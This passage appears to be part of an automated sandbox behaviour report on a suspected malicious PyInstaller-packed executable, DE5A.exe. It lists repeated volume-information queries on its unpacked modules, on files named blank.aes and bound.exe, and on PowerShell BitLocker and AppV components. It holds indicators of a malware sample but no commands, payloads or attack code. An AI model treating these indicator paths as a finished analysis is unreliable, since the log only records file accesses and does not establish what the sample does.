                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\blank.aes VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\blank.aes VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\blank.aes VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\blank.aes VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\blank.aes VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\blank.aes VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\_lzma.pyd VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\_bz2.pyd VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\_sqlite3.pyd VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\_socket.pyd VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\select.pyd VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\_ssl.pyd VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\_hashlib.pyd VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\_queue.pyd VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\bound.blank VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\bound.blank VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\bound.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\unicodedata.pyd VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
